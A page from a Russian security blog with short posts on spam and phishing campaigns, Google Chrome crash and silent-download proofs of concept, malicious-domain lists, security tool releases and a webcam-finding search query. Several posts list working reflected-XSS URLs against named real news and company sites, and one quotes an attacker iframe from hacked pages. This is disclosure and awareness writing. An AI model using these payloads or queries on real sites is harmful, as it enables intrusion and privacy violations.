Затем злоумышленник перезагружается в Windows Vista и использует комбинацию клавиш “Windows key”+”U” для вызова Utility Manager. Вместо него запускается файл cmd.exe c привилегиями учетной записи System.
Теги: Security, Windows Vista Постоянный адрес |  Просмотров: 1626 |  Комментариев: 0


 Валерий МарчукСпам со ссылкой на Яндекс
Сегодня получил спам следующего содержания:
Цитата

Привет
Глянь мои новые ню фоты и видео, уверана оцениш
лицам до 18 лет вход воспрещен
выложила только вчера
mail.yandex.ru/%72?url=http://warmymusic.com.ar/new_fotos.exe
Целую,
Твоя Марина

Как вы видите, используется механизм перенаправления на сайте Яндекса и пользователь перенаправляется на сайт warmymusic.com.ar. Будте осторожны и всегда проверяйте URL перед нажатием на него.
Теги: Спам Постоянный адрес |  Просмотров: 714 |  Комментариев: 0


 Валерий МарчукАктивная эксплуатация уязвимости в Microsoft Media Encoder ActiveX компоненте (MS08-053)
Symantec сообщил об обнаружении активной эксплуатации уязвимости в Microsoft Media Encoder ActiveX компоненте, описанной в бюллетене безопасности MS08-053.

Хронология событий:
9 сентября – выход бюллетеня безопасности от Microsoft
13 сентября – эксплоит находится в публичном доступе
15 сентября – ханипоты Symantec зафиксировали активную эксплуатацию уязвимости

По данным Symantec, эксплоит распространяется двумя путями:

  • В открытом виде, т.е. используется общедоступный шеллкод;
  • Кодированный шеллкод, распространяемый в e2 тулките.


Рекомендации:

Установка исправления:
Следует в кратчайшие сроки установить исправление от производителя. Ссылки на исправления для различных версий Windows.

Временное решение:

1. В качестве временного решения можно запретить доступ к уязвимой библиотеке WMEX.dll

Для Windows 2000, XP, 2003:

Цитата
Echo y| cacls "C:\Program Files\Windows Media Components\Encoder\wmex.dll" /E /P everyone:N


Для Windows Vista и 20008

Цитата
Takeown.exe /f "C:\Program Files\Windows Media Components\Encoder\wmex.dll"
Icacls.exe "C:\Program Files\Windows Media Components\Encoder\wmex.dll" /save %TEMP%\WMEX_ACL.TXT
Icacls.exe "C:\Program Files\Windows Media Components\Encoder\wmex.dll" /deny everyone:(F)


2. Отмена регистрации библиотеки WMEX.dll

Цитата
regsvr32.exe -u "C:\Program Files\Windows Media Components\Encoder\wmex.dll
Теги: Security Постоянный адрес |  Просмотров: 669 |  Комментариев: 0


 Валерий МарчукНаше будущее: реверсивные вишинг атаки
Вишинг атаки в последнее время становятся все более популярными среди злоумышленников.
Вишинг (Vishing == VoIP Phishing) – атака с использованием элементов социальной инженерии и VoIP для получения доступ к личным данным пользователей. Обычными рекомендациями против таких атак являются:
1. Проверка подлинности номера телефона компании, как правило, через Web сайт компании.
2. Перезвонить в компанию напрямую, чтобы быть уверенным, что вам звонят именно из этой компании.

На прошлой неделе Websense сообщила об обнаружении реверсивной вишинговой атаки в Китае. Злоумышленники сделали по существу бесполезными все вышеописанные предостережения:
1. Используя механизмы продвижения сайтов в поисковых системах, установили поддельные сайты компаний на первые позиции в поисковых запросах. (Использовались формы с большой посещаемостью).
2. Обманом заставили пользователей с помощью email перезвонить в компанию по указанному в письме номеру телефона.

Если пользователь решил проверить подлинность номера телефона через поисковую систему (к сожалению именно так и проверяется подлинность большинства номеров), он попадал на поддельный сайт, где был указан именно тот номер.

К сожалению, огромное количество уязвимостей в Web приложениях позволяют атакующему поместить необходимые данные и на Web сайт компании. Хотя подобной вишинг атаки еще не было, но это вполне возможный сценарий. К тому же, недавняя уязвимость в DNS может поспособствовать злоумышленникам в подмене содержимого Web сайта.
После звонка по указанному номеру, жертве включалась запись той компании, в которую он якобы звонил. Т.е. если вы когда-то уже звонили в эту компанию, то, услышав знакомую мелодию и «голос» АТС, у вас не возникнет больше никаких подозрений по поводу подлинности номера.

В Китае атака проводилась с использованием таких громких имен компаний как Sina, Taobao, QQ, Tencent и т.д.

Будьте осторожны, когда вам позвонят и скажут, что вы выиграли в лотерею и предложат стать «участником» вишинг атаки
Теги: Security Постоянный адрес |  Просмотров: 586 |  Комментариев: 0


 Валерий МарчукИ еще один DoS в Google Chrome (Обновлено)
Обнаружена очередная ошибка в браузере Google Chrome. На это раз, уязвимость существует из-за недостаточной проверки входных данных в имени файла в HTTP заголовке Content-Disposition.

PoC код:
Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC

Для автоматическоо закрытия браузера без каких-либо предупреждений достаточно отправить файл, длина имени которого около 1000 символов. Для появления окна с ошибкой и аварийного завершения работы браузера достаточно 300 символов в имени файла.

Цитата

Ответ сервера, завершающий работу браузера:
HTTP/1.1 200 OK
Date: Fri, 05 Sep 2008 06:48:34 GMT
Server: Apache/2.2.6 (Win32)
Content-Disposition: attachment; filename=<от 300 символов>.psd
Content-Length: 4
Connection: close
Content-Type: application/octet-stream

test



===============================================================
UPDATE
05.06.2008 14.46
===============================================================
На сайте PandaSecurity.com опубликовано видео с демонстрацией очередной ошибки в браузере. Уязвимость существует из-за ошибки при отображении адреса ссылки в строке состояния, при наведении курсора мышки на специально сформированную ссылку, добавленную в папку "Избранное".


Кому интересно, можно посмотреть статистику по использованию браузера Chrome по сравнению с другими браузерами:
http://blog.statcounter.com/2008/09/c...os-losing/
Теги: Security Постоянный адрес |  Просмотров: 717 |  Комментариев: 0


 Валерий МарчукОчередная уязвимость в Google Chrome Browser
Ажиотаж вокруг нового браузера от компании Google не спадает. Вчера Google анонсировала первую beta версию своего браузера, а сегодня уже есть 3 уязвимости

Первая, о которой я писал раньше, позволяет удаленному пользователю аварийно завершить работу браузера.

Вторая уязвимость, которую описал Авив Рафф, позволяет злоумышленнику выполнить произвольный файл на системе.

И третья, PoC код к которой был только что опубликован на секлабе, позволяет злоумышленнику без уведомления пользователя загрузить произвольный исполняемый файл на систему в каталог, где сохраняются по умолчанию все загружаемые файлы.
PoC код:
Цитата

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Ну что же, как вы видите, ошибки весьма примитивны для современного поколения браузеров. Будем надеяться, что выход официальной версии Google Chrome не будет сопровождаться таким же количеством уведомлений в первые два дня релиза
Теги: Security Постоянный адрес |  Просмотров: 679 |  Комментариев: 0


 Валерий МарчукПервый DoS в Google Chrome Browser
Итак, через несколько часов после релиза первой бета версии, Rishi Narang сообщил о первой обнаруженной ошибки в новом браузере от Google. Конечно же, наличие ошибок в бета версиях – вещь самая обычная, и в багтраки подобные ошибки не попадают, но я подумал, что читателям секлаба будет интересно узнать о факте обнаружения первой ошибки в Chrome

Итак, ссылка на эксплоит:
http://www.securitylab.ru/_download/e.../crash.htm

Код эксплоита:
<p>Нажмите <a href="EVIL:%">здесь</a>

В результате, браузер аварийно завершает работу. Уязвимость существует в версии 0.2.149.27 build 1583.

Описание уязвимости автором:
http://evilfingers.com/advisory/google_chrome_poc.php
Теги: Security Постоянный адрес |  Просмотров: 639 |  Комментариев: 0


 Валерий МарчукСписок доменов, используемых для внедрения злонамеренного кода через SQL инъекции
На shadowserver.org опубликован список доменов, которые используются для внедрения злонамеренного кода на сайты посредством SQL инъекции.
Цитата

www.nihaorr1.com
free.hostpinoy.info
xprmn4u.info
www.nmidahena.com
winzipices.cn
sb.5252.ws
www.aspder.com
www.11910.net
bbs.jueduizuan.com
www.bluell.cn
www.2117966.net
s.see9.us
xvgaoke.cn
www.414151.com
yl18.net
www.kisswow.com.cn
c.uc8010.com
www.ririwow.cn
www.killwow1.cn
www.qiqigm.com
www.wowgm1.cn
www.wowyeye.cn
9i5t.cn
computershello.cn
www.z008.net
b15.3322.org
www.direct84.com
www.caocaowow.cn
firestnamestea.cn
%61%31%38%38%2E%77%73 (a188.ws)
www.qiqi111.cn
www.banner82.com
smeisp.cn
www.nihao112.com
free.edivid.info
h28.8800.org
ucmal.com
www.adword71.com
w11.6600.org
usuc.us
www.wowgm2.cn
www.adword72.com
www.117275.cn
vb008.cn
www.wow112.cn
www.nihaoel3.com

Этот список вместе с количеством инфицированных сайтов доступен по адресу:
http://www.shadowserver.org/wiki/pmwi...r.20080514

Теги: Security Постоянный адрес |  Просмотров: 947 |  Комментариев: 1


 Валерий МарчукА есть ли копирайты в андерграунде?
Вы разрабатываете программное обеспечение, которое собираетесь распространять «не за спасибо» в андерграунде. Есть очень простое и надежное решение, предложенное производителями «Зевса»:



Эти меры не всегда помогают от неавторизованного распространения ПО, но все же улыбнуло
Теги: Security Постоянный адрес |  Просмотров: 753 |  Комментариев: 1


 Валерий МарчукMetasploit Framework v3.1 Released
Вышла версия Metasploit Framework 3.1 - без сомнения самого лучшего инструмента разработки эксплоитов. В новой версии полная поддержка Windows систем (с GUI) и более 450 модулей, включая 265 эсплоитов для удаленного использования.
Последняя версия, вместе со скриншотами, видео и документацией доступна на сайте:
http://metasploit3.com.
Теги: Software Постоянный адрес |  Просмотров: 788 |  Комментариев: 0


 Валерий МарчукРождественские подарки от Штормового червя
Началась рождественская рассылка Штормового червя с целью пополнить ботнет «свежими силами». Пользователю предлагается посмотреть стриптиз на сайте merrychristmasdude.com. Письмо может содержать следующую тему:

I love this Carol!
Santa Said, HO HO HO
Christmas Email
The Perfect Christmas
Find Some Christmas Tail
Time for a little Christmas Cheer

И подобное содержание:

do you have a min?

This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these.
http://merry christmasdude.com/

Доменное имя было зарегистрировано через nic.ru. Как и в предыдущих случаях бинарник меняется приблизительно каждые 15 минут.

Рекомендуем всем администраторам запрети доступ пользователей к домену merrychristmasdude.com.
Теги: Спам Постоянный адрес |  Просмотров: 1222 |  Комментариев: 4


 Валерий МарчукФишинг атака на пользователей Яндекс.Деньги
Очередная фишинг атака на пользователей Яндекс.Деньги. В этот раз выбрано доменное имя www.money-yandex.cn (202.83.213.19). Данные whois

Domain Name: money-yandex.cn
ROID: 20071219s10001s90031966-cn
Domain Status: ok
Registrant Organization: DomainsReg, LTD
Registrant Name: AstakhovSergey
Administrative Email: abuse@domainsreg.cn
Sponsoring Registrar: Е▌╕И≈╗Е█▌Е∙├Г⌡⌡Д╦√Г╫▒Г╩°Ф°┴И≥░Е┘╛Е▐╦
Name Server:ns1.xakepy.cn
Name Server:ns2.xakepy.cn
Registration Date: 2007-12-19 22:50
Expiration Date: 2008-12-19 22:50

Письмо выглядит следующим образом:



Сама страница выглядит внешне, как и страница Яндекса. После ввода паспортных данных пользователю предлагается ввести платежный пароль (http://www.money-yandex.cn/login.php) и, затем, пользователь перенаправляется на сайт yandex.ru.
Теги: Спам Постоянный адрес |  Просмотров: 1010 |  Комментариев: 0


 Валерий МарчукУкраинские телеканалы подымают свой рейтинг за счет спама?
Сегодня получил интересный спам. Интересный в том плане, что в письме рекламировались не виагра и др. медицинские средства или «бесплатный сыр», а телепередача.



УТ-1 единственный государственный телеканал в Украине. Видимо кто-то очень хотел поднять рейтинг любыми средствами

Время показа и даты стерты, чтобы не создавать доп. рекламу для тех, кто смог бы посмотреть эту программу.
Теги: Спам Постоянный адрес |  Просмотров: 1112 |  Комментариев: 1


 Валерий МарчукCisco IOS Shellcode
Компания IRM опубликовла видео с демонстрацией выполнения шеллкода на Cisco IOS.

Видео: Bind Shell
http://www.irmplc.com/content/videos/...shell.html

Видео: Reverse Shell
http://www.irmplc.com/content/videos/...final.html

Видео: "Two byte rootshell" or Tiny Shell
http://www.irmplc.com/content/videos/...final.html

Подробное описание на сайте
http://www.irmplc.com/index.php/153-E...s-Security

Вообще впечатляет, все переходим на Джуннипер
Теги: Security Постоянный адрес |  Просмотров: 713 |  Комментариев: 0


 Валерий МарчукMd5Checker - проверка контрольной суммы для Windows платформ
Md5Checker 3.1.1.1 - утилита, позволяющая проверить контрольну сумму файла.
Платформы: Windows NT/2000/XP/2003 Server/Vista
Скачать можно здесь: http://getmd5checker.com/download/
Теги: Software Постоянный адрес |  Просмотров: 3285 |  Комментариев: 0


 Валерий МарчукПравильная атака на каптчу
CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) – инструмент защиты от автоматического заполнения и отправки HTML форм, используемый большим количеством Web приложений (в том числе и на SecurityLab). Существует также большое количество проектов, занимающихся, так называемым, взломом каптчи (ссылки приводить не буду, в Google их много). Люди пишут различные парсеры картинок, пытаясь попиксельно определить изображенные символы на картинке, анализируют секретные код и т.д. Но это все очень сложно, трудоемко и не надежно, ведь каптча ориентирована на то, что именно человек распознает картинку и введет правильный код. Так почему бы для этого не использовать человека?
Pandalabs обнаружила, весьма оригинальный, вариант обхода каптчи, совместимый с социальной инжинерией:
Пользователю предлагается установить (устанавливается) десктопное приложение, которое отображает девушку, предлагающую посмотреть стриптиз.

Кто может от такого отказаться? Тем более, что для этого требуется лишь набрать несколько символов.


Далее вы помогаете приложению правильно распознать изображение, и, таким образом, помогаете атакующему обойти защиту каптчи.


Такое приложение определяется Pandalabs как Trj/RompeCaptchas.A.
PS респект тем, кто придумал этот вариант обхода каптчи
Теги: Security Постоянный адрес |  Просмотров: 1033 |  Комментариев: 4


 Валерий Марчук5 статей по взлому iPhone
HD Moore опубликовал в своем блоге 5 статей, в которых рассказывает о взломе iPhone. В первой статье рассказывается о архитектуре и демонстрируется шеллкод для уже измененного iPhone.
http://blog.metasploit.com/2007/09/ro...yours.html

Во второй статье речь идет об эксплуатации уязвимости в libtiff.
http://blog.metasploit.com/2007/10/cr...art-1.html

Третья статья пошагово рассказывает о разработке эксплоита для уязвимости в libtiff.
http://blog.metasploit.com/2007/10/cr...art-2.html

Четвертая статья рассказывает о различных методах эксплуатации уязвимости в libtiff для различных приложений.
http://blog.metasploit.com/2007/10/cr...rt-21.html

И пятая - последняя статья – рассказывает о процессе разработки пейлоада, способного записать произвольные данные на диск и выполнить код. Статья заканчивается демонстрацией шелла, которым можно воспользоваться для получения удаленного доступа к iPhone, и демонстриурет, как можно с помощью шелла установить патч к уязвимости в libtiff от стороннего производителя.
http://blog.metasploit.com/2007/10/cr...art-3.html

Рекомендую читать всем
Теги: Security Постоянный адрес |  Просмотров: 858 |  Комментариев: 0


 Валерий МарчукeEye выпустила Blink Personal Edition 3.5.0 BETA
Blink Personal Edition –комплексное решение для обеспечения безопасности от eEye Digital Security. Скачать приложение можно по адресу:
http://download.eeye.com/html/product...beta35.exe
MD5: fce10f5ffde959548ceaddd540b936d3
SHA-1: 758895818f4716640b4f9f16504623e11d77024f

Более подробно о функционале можно узнать здесь:
http://forums.eeye.com/forums/t/329.aspx
Теги: Software Постоянный адрес |  Просмотров: 804 |  Комментариев: 0


 Валерий МарчукSQL CodeSecure v1.0 для MS SQL 2005
SQL CodeSecure является утилитой для защиты и аудита SQL Server 2005. Утлита позволяет следить за всеми изменениями в базе данных, логируя время, пользователя, IP адрес тип изменения и измененный объект, сам TSQL запрос и многое другое. Поскольку утилита вышла только сегодня и сайт разработчика недоделан, в ней возможны ошибки и бреши, но все же стоит посмотреть и оценить сам продукт, т.к. заявлен интересный функционал.
Триальную версию можно скачать по адресу http://www.sql-labs.com/downloads/SQLCodeSecure.zip
Документация
Теги: Software Постоянный адрес |  Просмотров: 607 |  Комментариев: 0


 Валерий МарчукВсе видеозаписи выступлений с DefCon 15
Доступны для просмотра архивы с видеозаписями всех докладов с DefCon 15. Приятного всем просмотра!

Теги: Security Постоянный адрес |  Просмотров: 4950 |  Комментариев: 2


 Валерий МарчукИ снова Google открывает доступ к закрытым данным
Web камеры часто используются для видеонаблюдения и являются, таким образом, средством обеспечения безопасности. К сожалению в неумелых руках он могут стать средством утечки конфиденциальных данных.
Вы можете набрать в Google запрос «inurl:/view.index.shtml» и просмотреть список доступных публичных и частных web камер.

Теги: Security Постоянный адрес |  Просмотров: 690 |  Комментариев: 1


 Валерий МарчукВзломан сайт лаборатории Касперского
Хакер, назвавший себя The_RedBull, взломал сайт мексиканского представительства лаборатории Касперского www.kaspersky.com.mx

Скриншот дефейса на 14.15 МСК



Увеличить
Теги: Security Постоянный адрес |  Просмотров: 669 |  Комментариев: 1


 Валерий МарчукCaffeine Monkey 0.5.1
Утилита позволяет обнаружить JavaScript код, внедренный хакерами в Web страницу. Утилита показывает, что этот код делает на самом деле и позволяет специалистам по безопасности создать алгоритмы/функции для классификации, требуемой им. Основным преимуществом утилиты является то, что она основана на поведении кода, а не на его сигнатурах. Утилита обнаруживает специфические действия, характерны злонамеренному коду. Распространяется по лицензии GNU.

Caffeine Monkey 0.5.1

Документация к утилите

Презентация с Black Hat USA 2007
Теги: Software Постоянный адрес |  Просмотров: 540 |  Комментариев: 0


 Валерий МарчукВышла новая версия Immunity Debugger v1.1
Вышла обновленная версия дебаггера от компании Immunity, Inc. Immunity Debugger v1.1.
Все желающи могут его скачать отсюда:

http://debugger.immunityinc.com/register.html (требуется регистрация).

Теги: Software Постоянный адрес |  Просмотров: 967 |  Комментариев: 0


 Валерий МарчукРусские хакеры атакуют Интернет
Компания Тренд Микро сообщает о выходе «обновлений» к n404 Web Threat Kit.
Растет количество взломанных сайтов, на которых размещается тег Iframe следующего содержания:

Цитата

<iframe src=’http://81.{BLOCKED}.27/go.php?sid=1′ style=’border:0px solid
gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0
SCROLLING=no></iframe>


Код загружает сценарий VBScript и эксплуатирует уязвимость браузера для получения контроля над пользовательским компьютером. Генерация VBScript сценария происходит случайным образом, что существенно затрудняет обнаружение такого когда антивирусными ПО.
Тренд Микро утверждает, что сервер, на котором хостится злонамеренный код принадлежит русской компании.
Теги: Security Постоянный адрес |  Просмотров: 652 |  Комментариев: 0


 Валерий МарчукВышла новая версия PHPIDS
Вчера вышла новая версия PHPIDS (PHP-Intrusion Detection System) 0.3.2.
Приложение представляет собой систему обнаруженя вторжения для Web сайта, написанную на PHP. Распространяется по лицензии LGPL.
http://php-ids.org/downloads/
Теги: Software Постоянный адрес |  Просмотров: 593 |  Комментариев: 0


 Валерий МарчукОнлайн сервисы для защиты вашей системы
Я решил опубликовать список on-line служб, которые могут помочь проверить безопасность вашей системы.

Сканирование компьютера с помощью антивирусов:
Symantec Security Check
Kaspersky Online Scanner
F-Secure Online Virus Scanner
McAfee FreeScan
Trend Micro™ HouseCall
BitDefender Online Scanner
Windows Live OneCare Safety Scanner
Panda ActiveScan
ESET Online Scanner
NanoScan

Службы сканирования файлов:
VirusTotal
VirSCAN
VirusChief
Malware Scan
Virus.Org Rogue File Scanning Service

Комплесные тесты комьютера, тесты межсетевого экрана:
AUDIT MY PC
HackerWhacker
Shields UP!
Теги: Security Постоянный адрес |  Просмотров: 1337 |  Комментариев: 0


 Валерий МарчукУстановлена новая версия форума
Установлена новая версия форума, в которой:
1. добавлена новая возможность отправлять личные сообщения зарегистрированным посетителям форума. Работа с сообщениями осуществляется на странице "Личные сообщения", где можно написать, прочитать, удалить письмо в корзину или сохранить его в одной из настраиваемых папок. При получении нового личного сообщения, пользователю приходит уведомление по E-Mail
2. добавлена возможность предпросмотра сообщения перед отправкой
3. Новая страница для просмотра последних тем на всех форумах
4. Добавлена возможность модератору переносить темы текущего форума на другой форум, где он не является модератором
5. Внесены косметические изменения в страницу профиля пользователя
6. Появилась возможность подписки на текущую тему при создании сообщения
Теги: Сайт SecurityLab.ru Постоянный адрес |  Просмотров: 686 |  Комментариев: 12


 Валерий МарчукОбновление верстки на сайте
Сайт SecurityLab уже на новой HTML верстке. Если у кого будут проблемы с отображением контента нажмите пожалуйста ctrl+F5 в браузере.
Если вы заметили проблемы с отображением содержимого, не стесняйтесь писать об этом в комментариях
Теги: Сайт SecurityLab.ru Постоянный адрес |  Просмотров: 680 |  Комментариев: 13


 Валерий МарчукXSS на новостных сайтах
Цитата

www.chicagotribune.com/shopping/?track=ShoppingTab"><script>alert('www.securitylab.ru')</script>

www.villagevoice.com/home/index.php?page=categpage--><script>alert('www.securitylab.ru')</script>&categ=Features&categlabel=Features&lab_id=4

www.csmonitor.com/csmonitor/web/guest/emailServices/signup?s=pcf&email=Your%20email%20address"><script>alert('www.securitylab.ru')</script>

www.latimes.com/classified/genmerch/results.classified?class=**3905%2D3940**,%2066005,%2066010,%2066015,%2066020,%2066025,%2066030,%2066035,%2066040"><script>alert('www.securitylab.ru')</script>

www.cnet.com/2001-1_1-0.html?tag=--><script>alert('www.securitylab.ru')</script>
news.zdnet.com/2100-3513_22-6102226.html?X--><script>alert()</script>

www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today"><script>alert('www.securitylab.ru')</script>

money.cnn.com/.element/ssi/data/1.0/hotstocks.exclude.html?uid=%7B38B942FF%2D0B95%2D437C%2DAC98%2D129FF9653198%7D"><script>alert('www.securitylab.ru')</script>

wired.com/wireservice/headlines.php?section=Breaking&firstStory=1--><script>alert()</script>&nosubnav=true

www.cbc.ca/programguide/schedule/dailySchedule.jsp?network=CBC%20Radio%20One"></a><script>alert('www.securitylab.ru')</script>

www.msnbc.msn.com/?id/3053419&qp=81756'></script><script>alert('www.securitylab.ru')</script>

news.aol.com/nation/story/_a/bomb-threat-shuts-down-new-york-hospital/n20060819000509990011?cid=505');"></a><script>alert('www.securitylab.ru')</script>

www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--><script>alert('www.securitylab.ru')</script>

www.dailybruin.ucla.edu/news/packages.asp?ID=43&Date=1');"></a><script>alert('www.securitylab.ru')</script>
Теги: Security Постоянный адрес |  Просмотров: 788 |  Комментариев: 0


 Валерий МарчукXSS на eEye.com
Компания eEye утверждает что на их сайте не было XSS. Собственно, а что следовало ожидать от компании, которая не способна защитить свой web стайт?

Example:
Follow the link and press the "Back" button.
Цитата

www.eeye.com//~apps/shop/checkout.asp?referer=javascript:alert('www.securitylab.ru')&rnd=060816.123112.125229.323
Теги: Security Постоянный адрес |  Просмотров: 1329 |  Комментариев: 2


 Валерий МарчукXSS на live.com

Цитата

boards.live.com/themes/us/en/ccode.aspx?ForumId=0--></script><script>alert(String.fromCharCode(83,101,99,117,114,105,116,121,108,97,98,46,114,117))</script>
Теги: Security Постоянный адрес |  Просмотров: 772 |  Комментариев: 2


 Валерий МарчукXSS на сайтах MSN
Discovered by Thomas Pollet

Цитата

movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('www.securitylab.ru


Цитата

boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--></script><script>alert(1)</script>
Теги: Security Постоянный адрес |  Просмотров: 815 |  Комментариев: 0

Сообщения 1 - 45 из 70
Начало | Пред. | 1 2 | След. | Конец




«   Февраль 2010   »

Пн Вт Ср Чт Пт Сб Вс
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
             



Топ-менеджер Microsoft настаивает на введении прав для пользователей Сети

Перед выходом в Интернет каждый пользователь ПК должен будет пройти обязательный курс подготовки и ...

просмотры: 3806, отзывы: 99

Аддоны для Firefox заражены троянскими программами

Компания Mozilla сегодня выпустила два экстренных бюллетеня по информационной безопасности, где гово ...

просмотры: 5455, отзывы: 106

Windows 7 уничтожает аккумуляторы ноутбуков

Посетители форума Microsoft TechNet утверждают, что срок службы аккумулятора заметно сократился посл ...

просмотры: 8144, отзывы: 86

Хакеры поздравили Тимошенко с поражением

Сайт премьер-министра Украины Юлии Тимошенко был взломан хакерами. Вместо стартовой страницы на сайт ...

просмотры: 3756, отзывы: 46

ФБР хочет следить за пользователями Интернета

На днях директор ФБР Роберт Мюллер заявил, что он собирается добиваться того, чтобы провайдеры из СШ ...

просмотры: 1783, отзывы: 44

Доктор Веб: Первая вирусная эпидемия 2010 года

В январе 2010 года основное количество обращений пользователей по поводу активных заражений было свя ...

просмотры: 4609, отзывы: 75

В России Trojan.Winlock заразил миллионы компьютеров

Только за январь число пострадавших в России от блокировщиков Windows составило несколько миллионов ...

просмотры: 13570, отзывы: 123

Windows 8 может выйти в 2011 году

По новой информации, клиентская операционная система Windows 8 выйдет уже в следующем году. Известно ...

просмотры: 7056, отзывы: 97

Суд закрыл сайт, распространяющий курительные смеси

Орджоникидзевский районный суд г. Екатеринбурга вынес решение по иску прокурора Орджоникидзевского р ...

просмотры: 1239, отзывы: 41

Обнаружена уязвимость в Internet Explorer

В опубликованном на сайте Microsoft уведомлении говорится, что уязвимость может эксплуатироваться зл ...

просмотры: 3124, отзывы: 50

Microsoft повысит компьютерную грамотность россиян

Инициатива рассчитана на три года, предполагаемый объем инвестиций составит 151,5 млн рублей. До кон ...

просмотры: 2274, отзывы: 54

Американский студент исследовал файлы в торрент-сетях

В ходе исследования выяснилось, что 99% файлов, проходящих через торрент-сети, содержат нелиценз ...

просмотры: 3359, отзывы: 47

Осторожно ФИШИНГ!!!

Дата: 09 февраля, 2010
Автор: Александр

W2K8

Дата: 06 февраля, 2010
Автор: l4r4n

Системный администратор Unix/Linux

Дата: 21 декабря, 2009
Автор: Анастасия Пирогова

sec7x24.net: Информационная безопасность 7х24

Дата: 25 января, 2010
Автор: grub

билайн жульничает?

Дата: 13 января, 2010
Автор: phoenix







Подписка на рассылки